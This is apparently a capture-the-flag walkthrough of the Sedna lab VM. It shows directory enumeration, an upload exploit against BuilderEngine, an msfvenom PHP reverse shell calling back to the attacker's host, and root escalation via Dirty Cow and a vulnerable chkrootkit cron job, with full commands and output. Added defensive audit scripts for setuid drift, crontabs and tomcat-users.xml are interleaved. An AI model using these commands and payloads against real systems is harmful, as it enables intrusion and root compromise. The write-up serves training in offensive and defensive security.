+ http://192.168.1.28/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.1.28/system/
==> DIRECTORY: http://192.168.1.28/themes/
---- Entering directory: http://192.168.1.28/blocks/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/system/ ----
==> DIRECTORY: http://192.168.1.28/system/core/
==> DIRECTORY: http://192.168.1.28/system/database/
==> DIRECTORY: http://192.168.1.28/system/fonts/
==> DIRECTORY: http://192.168.1.28/system/helpers/
+ http://192.168.1.28/system/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://192.168.1.28/system/language/
==> DIRECTORY: http://192.168.1.28/system/libraries/
---- Entering directory: http://192.168.1.28/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/system/core/ ----
==> DIRECTORY: http://192.168.1.28/system/core/compat/
+ http://192.168.1.28/system/core/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/ ----
==> DIRECTORY: http://192.168.1.28/system/database/drivers/
+ http://192.168.1.28/system/database/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/fonts/ ----
+ http://192.168.1.28/system/fonts/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/helpers/ ----
+ http://192.168.1.28/system/helpers/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/language/ ----
==> DIRECTORY: http://192.168.1.28/system/language/english/
+ http://192.168.1.28/system/language/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/libraries/ ----
+ http://192.168.1.28/system/libraries/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/core/compat/ ----
+ http://192.168.1.28/system/core/compat/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/ ----
+ http://192.168.1.28/system/database/drivers/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://192.168.1.28/system/database/drivers/mssql/
==> DIRECTORY: http://192.168.1.28/system/database/drivers/mysql/
==> DIRECTORY: http://192.168.1.28/system/database/drivers/odbc/
---- Entering directory: http://192.168.1.28/system/language/english/ ----
+ http://192.168.1.28/system/language/english/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/mssql/ ----
+ http://192.168.1.28/system/database/drivers/mssql/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/mysql/ ----
+ http://192.168.1.28/system/database/drivers/mysql/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/odbc/ ----
+ http://192.168.1.28/system/database/drivers/odbc/index.html (CODE:200|SIZE:142)
-----------------
END_TIME: Wed May 17 15:35:17 2017
DOWNLOADED: 64568 - FOUND: 16
root@kali:~#

There are a plethora of interesting directories that dirb managed to find. Let's comb through them (blocks, files, modules, system, themes). This being a CTF, we can safely assume that an obsolete theme or plugin might be in use. Going through the directories we find:

http://192.168.1.28/themes/default_theme_2016/description.txt

Default Theme 2016 for BuilderEngine V3.

Doing a basic Google search for "BuilderEngine exploit" gives us an Exploit-DB result for an arbitrary file upload.

Let's modify the exploit to fit our needs. All we need to do is change the target host to 192.168.1.28.

Let's generate a PHP reverse shell and upload it using the above exploit.

root@kali:~/Desktop/B2R# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes
root@kali:~/Desktop/B2R# file shell.php
shell.php: ASCII text, with very long lines, with no line terminators
root@kali:~/Desktop/B2R#

As the exploit code indicates, the uploaded file should be reachable at http://192.168.1.28/files/shell.php

Before we request our shell, though, we need to set up the handler in msfconsole.

root@kali:~# msfconsole
=[ metasploit v4.12.23-dev                         ]
+ -- --=[ 1578 exploits - 907 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.34:4444
[*] Starting the payload handler...

Now request the shell at http://192.168.1.28/files/shell.php and the handler catches the session.

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.34:4444
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to 192.168.1.28
[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.28:55176) at 2017-05-17 15:46:37 -0400
meterpreter > ls
Listing: /var/www/html/files
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  32     fil   2016-10-24 13:45:38 -0400  .htaccess
40755/rwxr-xr-x   4096   dir   2016-10-24 13:45:38 -0400  .tmb
40755/rwxr-xr-x   4096   dir   2016-10-24 13:45:38 -0400  be_demo
100644/rw-r--r--  66456  fil   2016-10-24 13:45:38 -0400  blogimage.jpg
40755/rwxr-xr-x   4096   dir   2016-10-24 13:45:38 -0400  captcha
100644/rw-r--r--  37022  fil   2016-10-24 13:45:38 -0400  loading.gif
100644/rw-r--r--  948    fil   2017-05-17 15:44:19 -0400  shell.php
40755/rwxr-xr-x   4096   dir   2016-10-24 13:45:38 -0400  users
meterpreter > shell
Process 6501 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cd /var/www
ls
flag.txt
html
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289 =====> Flag 1

Our next step is to become root by escalating our privileges, so let's enumerate the local machine and search for relevant exploits.

meterpreter > shell
Process 5733 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/var/www/html/files$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@Sedna:/var/www/html/files$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

Privilege Escalation — Method 1

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) — ‘overlayfs’ Privilege Escalation is what catches our attention, but unfortunately it fails to spawn a root shell: after running the compiled binary, id still reports www-data.

www-data@Sedna:/tmp$ gcc 37292.c -o ofs
gcc 37292.c -o ofs
www-data@Sedna:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Sedna:/tmp$ ls
ls
37292.c hsperfdata_tomcat7 ofs tomcat7-tomcat7-tmp
www-data@Sedna:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
www-data@Sedna:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Sedna:/tmp$

Let's have a look at a more recent exploit, Dirty Cow. Searching for Dirty Cow exploits turns up one on Exploit-DB, but running it repeatedly crashed my Sedna machine. Looking further, I found a list of Dirty Cow PoCs; the one that worked was put together by @robinverton.

Running this exploit gave us root.

meterpreter > pwd
/var/www/html/files
meterpreter > cd /tmp
meterpreter > pwd
/tmp
meterpreter > upload /root/Desktop/B2R/cowroot.c .
[*] uploading : /root/Desktop/B2R/cowroot.c -> .
[*] uploaded : /root/Desktop/B2R/cowroot.c -> ./cowroot.c
meterpreter > shell
Process 7730 created.
Channel 3 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$ gcc cowroot.c -o cowroot -pthread
gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:108:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
lseek(f,map,SEEK_SET);
^
In file included from cowroot.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
^
cowroot.c: In function 'main':
cowroot.c:151:5: warning: format '%d' expects argument of type 'int', but argument 2 has type '__off_t' [-Wformat=]
printf("Size of binary: %d\n", st.st_size);
^
www-data@Sedna:/tmp$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
root@Sedna:/tmp# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

root@Sedna:/tmp# cd /root
cd /root
root@Sedna:/root# ls -la
ls -la
total 65776
drwx------ 5 root root 4096 Mar 12 00:54 .
drwxr-xr-x 21 root root 4096 Oct 7 2016 ..
-rw------- 1 root root 212 Mar 12 00:54 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Oct 22 2016 .cache
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 66 Oct 8 2016 .selected_editor
drwx------ 2 root root 4096 Oct 22 2016 .ssh
-rw-r--r-- 1 root root 67309882 Oct 24 2016 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
drwxr-xr-x 2 root root 4096 Oct 7 2016 chkrootkit
---------- 1 root root 33 Oct 22 2016 flag.txt
root@Sedna:/root# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305 =====> Flag 2
root@Sedna:/root#
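Both escalation routes on this box leave traces on disk that a periodic integrity check catches: the PoC above reports that it backs up /usr/bin/passwd to /tmp/bak and then overwrites the setuid binary, and the cron-based route below ends with a root-owned setuid binary in /tmp. The following is an added example (not from the walkthrough or from any of the PoCs it uses) of the check a defender would run: baseline the hashes of setuid-root binaries, then report any that changed, appeared or disappeared, and locate byte-identical copies of the original. The function names and the temporary tree are mine; on a real host you would baseline `/` and keep the baseline off-box.

```python
"""Baseline and drift check for setuid binaries.

Added example for the Sedna walkthrough. The on-disk side effects are
reproduced in a constructed temporary tree owned by the current user,
so the owner filter is CURRENT_UID here and would be 0 on a real host.
"""
import hashlib
import os
import shutil
import stat
import tempfile

CURRENT_UID = os.getuid()


def sha256_file(path):
    """Stream the file through SHA-256 so large binaries are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def walk_files(root):
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            yield os.path.join(dirpath, fn)


def find_setuid(root, owner_uid=0):
    """Map relative path -> sha256 for every setuid regular file owned by owner_uid."""
    result = {}
    for full in walk_files(root):
        st = os.lstat(full)
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
            result[os.path.relpath(full, root)] = sha256_file(full)
    return result


def diff_baseline(baseline, current):
    """Return (modified, added, removed) relative paths, each sorted."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def find_by_hash(root, digest):
    """Locate files with a given hash, e.g. a backup copy of the original binary."""
    return sorted(os.path.relpath(p, root) for p in walk_files(root)
                  if sha256_file(p) == digest)


def build_tree():
    """Constructed stand-in for a clean host: one setuid 'passwd', empty /tmp."""
    root = tempfile.mkdtemp(prefix="fim_")
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.makedirs(os.path.join(root, "tmp"))
    passwd = os.path.join(root, "usr", "bin", "passwd")
    with open(passwd, "wb") as fh:
        fh.write(b"\x7fELF constructed stand-in for /usr/bin/passwd\n")
    os.chmod(passwd, 0o4755)
    return root


def simulate_compromise(root):
    """Reproduce the side effects the walkthrough's output describes (constructed)."""
    passwd = os.path.join(root, "usr", "bin", "passwd")
    # "Backing up /usr/bin/passwd to /tmp/bak": a plain copy, mode not preserved.
    shutil.copyfile(passwd, os.path.join(root, "tmp", "bak"))
    # "/usr/bin/passwd overwritten": contents replaced, setuid bit kept.
    # (Writing as an unprivileged user clears the bit, hence the second chmod.)
    with open(passwd, "wb") as fh:
        fh.write(b"\x7fELF constructed stand-in for overwritten contents\n")
    os.chmod(passwd, 0o4755)
    # Method 2 leaves a setuid binary in /tmp ("-rwsr-xr-x 1 root root ... suid").
    suid = os.path.join(root, "tmp", "suid")
    with open(suid, "wb") as fh:
        fh.write(b"\x7fELF constructed setuid helper\n")
    os.chmod(suid, 0o4755)


def demo():
    """Baseline, compromise, re-scan; returns (modified, added, removed, copies)."""
    root = build_tree()
    baseline = find_setuid(root, CURRENT_UID)
    simulate_compromise(root)
    modified, added, removed = diff_baseline(baseline, find_setuid(root, CURRENT_UID))
    copies = find_by_hash(root, baseline["usr/bin/passwd"])
    return modified, added, removed, copies


if __name__ == "__main__":
    m, a, r, c = demo()
    print("modified:", m, "added:", a, "removed:", r, "copies of original:", c)
```

The hash comparison is what distinguishes the Dirty Cow case from a legitimate package upgrade only when the baseline is refreshed as part of patching; a drift report immediately after `apt-get upgrade` is expected, one at 15:46 on a Wednesday is not.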

Privilege Escalation — Method 2

Check for scheduled activities/cron jobs.

www-data@Sedna:/etc$ ls -al /etc/cron*
ls -al /etc/cron*
-rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw-r--r-- 1 root root 510 Jul 7 2014 php5
/etc/cron.daily:
total 96
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 625 Apr 3 2014 apache2
-rwxr-xr-x 1 root root 376 Apr 4 2014 apport
-rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
-rwxr-xr-x 1 root root 314 Feb 17 2014 aptitude
-rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
-rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
-rwxr-xr-x 1 root root 1029 Jun 5 2014 libvirt-bin
-rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
-rwxr-xr-x 1 root root 1261 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
-rwxr-xr-x 1 root root 249 Feb 16 2014 passwd
-rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
-rwxr-xr-x 1 root root 383 Jun 25 2014 samba
-rwxr-xr-x 1 root root 728 Feb 27 2014 tomcat7
-rwxr-xr-x 1 root root 214 Apr 9 2014 update-notifier-common
-rwxr-xr-x 1 root root 328 Jul 18 2014 upstart
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.weekly:
total 36
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 211 Apr 9 2014 update-notifier-common
www-data@Sedna:/etc$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@Sedna:/etc$ cd chkrootkit
cd chkrootkit
www-data@Sedna:/etc/chkrootkit$ ls
ls
ACKNOWLEDGMENTS README.chklastlog chklastlog.c chkutmp.c
COPYRIGHT README.chkwtmp chkproc.c chkwtmp.c
Makefile check_wtmpx.c chkrootkit ifpromisc.c
README chkdirs.c chkrootkit.lsm strings.c
www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -h
./chkrootkit -h
Usage: ./chkrootkit [options] [test ...]
Options:
-h show this help and exit
-V show version information and exit
-l show available tests and exit
-d debug
-q quiet mode
-x expert mode
-r dir use dir as the root directory
-p dir1:dir2:dirN path for the external commands used by chkrootkit
-n skip NFS mounted dirs
www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -V
./chkrootkit -V
chkrootkit version 0.49
www-data@Sedna:/etc/chkrootkit$

From this information we can infer that the cron job is executed every 17 minutes and that a vulnerable version of chkrootkit (0.49) is installed. Details of the exploit can be found here.

Upload update and suid.c to the /tmp directory of the victim, and do not forget to make update executable.

meterpreter > pwd
/tmp
meterpreter > upload /root/Desktop/B2R/suid.c .
[*] uploading : /root/Desktop/B2R/suid.c -> .
[*] uploaded : /root/Desktop/B2R/suid.c -> ./suid.c
meterpreter > upload /root/Desktop/B2R/update .
[*] uploading : /root/Desktop/B2R/update -> .
[*] uploaded : /root/Desktop/B2R/update -> ./update
meterpreter > shell
Process 18632 created.
Channel 5 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$ ls
ls
hsperfdata_tomcat7 suid.c tomcat7-tomcat7-tmp update
www-data@Sedna:/tmp$ chmod +x update
chmod +x update
www-data@Sedna:/tmp$ gcc suid.c -o suid
gcc suid.c -o suid
www-data@Sedna:/tmp$ ls -la
ls -la
total 32
drwxrwxrwt 4 root root 4096 May 18 21:04 .
drwxr-xr-x 21 root root 4096 Oct 7 2016 ..
drwxr-xr-x 2 tomcat7 tomcat7 4096 May 18 12:35 hsperfdata_tomcat7
-rwxr-xr-x 1 www-data www-data 7342 May 18 21:04 suid
-rw-r--r-- 1 www-data www-data 73 May 18 21:04 suid.c
drwxr-xr-x 2 tomcat7 root 4096 May 18 12:35 tomcat7-tomcat7-tmp
-rwxr-xr-x 1 www-data www-data 78 May 18 21:04 update
www-data@Sedna:/tmp$ ls -la suid
ls -la suid
-rwsr-xr-x 1 root root 7342 May 18 21:04 suid

www-data@Sedna:/tmp$ ./suid
./suid
root@Sedna:/tmp# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
root@Sedna:/tmp# cat /root/flag.txt
cat /root/flag.txt
a10828bee17db751de4b936614558305
root@Sedna:/tmp#
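What made this route work is a root-run scheduled job that acts on a file an unprivileged user could place in /tmp. The following is an added example (not from the walkthrough) of the audit a defender would run over the crontab shown above: parse each entry, report the schedule its five time fields encode, flag scripts in the run-parts directories of root jobs that other users can write to, and check the chkrootkit version against 0.50, the release that removed the behaviour relied on here. The crontab text is copied from the output above; the cron.daily layout and the group/world-writable `custom-job` script are constructed to exercise the check, and the function names are mine.

```python
"""Audit system crontab entries and the installed chkrootkit version.

Added example for the Sedna walkthrough. CRONTAB is the /etc/crontab
shown in the walkthrough; the directory tree is constructed.
"""
import os
import re
import stat
import tempfile

CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
"""

FIELDS = ("minute", "hour", "dom", "month", "dow", "user", "command")


def parse_crontab(text):
    """Return one dict per job line; comments and VAR=value lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        parts = line.split(None, 6)  # the command keeps its internal spaces
        if len(parts) == 7:
            entries.append(dict(zip(FIELDS, parts)))
    return entries


def describe_schedule(e):
    """Plain-language reading of the m h dom mon dow fields for the common shapes."""
    m, h, dom, mon, dow = (e[k] for k in FIELDS[:5])
    if (h, dom, mon, dow) == ("*", "*", "*", "*"):
        return "hourly at minute %s" % m
    if (dom, mon, dow) == ("*", "*", "*"):
        return "daily at %02d:%02d" % (int(h), int(m))
    if (dom, mon) == ("*", "*"):
        return "weekly on weekday %s at %02d:%02d" % (dow, int(h), int(m))
    if (mon, dow) == ("*", "*"):
        return "monthly on day %s at %02d:%02d" % (dom, int(h), int(m))
    return " ".join((m, h, dom, mon, dow))


def run_parts_dirs(command):
    """Directories handed to run-parts, skipping options such as --report."""
    return re.findall(r"run-parts\s+(?:--\S+\s+)*(\S+)", command)


def audit_run_parts(entries, root="/"):
    """Flag run-parts directories or scripts of root jobs that group/other can write."""
    findings = []
    for e in entries:
        if e["user"] != "root":
            continue
        for d in run_parts_dirs(e["command"]):
            full = os.path.join(root, d.lstrip("/"))
            if not os.path.isdir(full):
                continue
            if os.stat(full).st_mode & 0o022:
                findings.append((d, "directory is group/world-writable"))
            for fn in sorted(os.listdir(full)):
                st = os.stat(os.path.join(full, fn))
                if stat.S_ISREG(st.st_mode) and st.st_mode & 0o022:
                    findings.append((os.path.join(d, fn), "script is group/world-writable"))
    return findings


def chkrootkit_vulnerable(version_output):
    """True for releases before 0.50, given the text printed by chkrootkit -V."""
    mt = re.search(r"chkrootkit version (\d+)\.(\d+)", version_output)
    if not mt:
        raise ValueError("unrecognised chkrootkit -V output")
    return (int(mt.group(1)), int(mt.group(2))) < (0, 50)


def build_sample_root():
    """Constructed tree: a cron.daily with one sane and one over-permissive script."""
    root = tempfile.mkdtemp(prefix="cron_")
    daily = os.path.join(root, "etc", "cron.daily")
    os.makedirs(daily)
    os.chmod(daily, 0o755)
    for name, mode in (("apache2", 0o755), ("custom-job", 0o777)):
        path = os.path.join(daily, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n# constructed placeholder\n")
        os.chmod(path, mode)
    return root


def demo():
    entries = parse_crontab(CRONTAB)
    return {
        "schedules": [describe_schedule(e) for e in entries],
        "findings": audit_run_parts(entries, build_sample_root()),
        "chkrootkit_vulnerable": chkrootkit_vulnerable("chkrootkit version 0.49"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The writability check covers the generic case (a root job executing something other users can edit); the version check covers the specific one on this box, where the fix is simply the package upgrade that Ubuntu shipped.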

Searching for the third flag

root@Sedna:/tmp# cd /etc/tomcat7
cd /etc/tomcat7
root@Sedna:/etc/tomcat7# ls
ls
Catalina context.xml policy.d tomcat-users.xml
catalina.properties logging.properties server.xml web.xml
root@Sedna:/etc/tomcat7# tail tomcat-users.xml
tail tomcat-users.xml
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
<user username="both" password="tomcat" roles="tomcat,role1"/>
<user username="role1" password="tomcat" roles="role1"/>
-->
<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>
root@Sedna:/etc/tomcat7#
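The third flag is a plaintext password that grants the manager-gui role, which is exactly what a review of tomcat-users.xml should surface before an attacker does. The following is an added example (not from the walkthrough or from Tomcat) that parses the file and reports, per account, membership of Manager or Host Manager roles, use of the sample accounts Tomcat ships commented out, and passwords that are not stored as a digest. The `TOMCAT_USERS` text reassembles the `tail` output above into a complete document (the opening element is not visible on the page, so that part is constructed), and the function names are mine.

```python
"""Audit tomcat-users.xml for privileged and weakly stored accounts.

Added example for the Sedna walkthrough. Comments are dropped by the XML
parser, so the shipped sample accounts inside <!-- --> are ignored here,
just as Tomcat ignores them.
"""
import re
import xml.etree.ElementTree as ET

TOMCAT_USERS = """\
<tomcat-users>
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>
"""

# Roles that grant access to the Manager or Host Manager web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# The sample accounts from the commented block; they must never be live.
SAMPLE_ACCOUNTS = {("tomcat", "tomcat"), ("both", "tomcat"), ("role1", "tomcat")}

# A digested password is a hex string of MD5, SHA-1 or SHA-256 length.
HEX_DIGEST = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.IGNORECASE)


def local_name(tag):
    """Strip a namespace so Tomcat 8+ files (which set xmlns) parse the same way."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return [(username, [reasons])] for every live <user> element."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if local_name(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""  # Tomcat accepts either
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        reasons = []
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            reasons.append("privileged roles: " + ",".join(privileged))
        if (name, password) in SAMPLE_ACCOUNTS:
            reasons.append("shipped sample credentials")
        if password and not HEX_DIGEST.match(password):
            reasons.append("password stored in plain text")
        findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for user, reasons in audit_tomcat_users(TOMCAT_USERS):
        print(user, "->", "; ".join(reasons) or "ok")
```

The digest heuristic only says how the password is stored, not whether it is strong; for the manager-gui account the finding that matters is that the Manager application is reachable with a static credential at all, so the mitigation is to restrict or remove that role rather than to pick a better password.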

The privilege escalation part was tough, as variants of the Dirty Cow exploit just crashed the machine, but in the end we were able to escalate our privileges.

Happy Hacking !!!
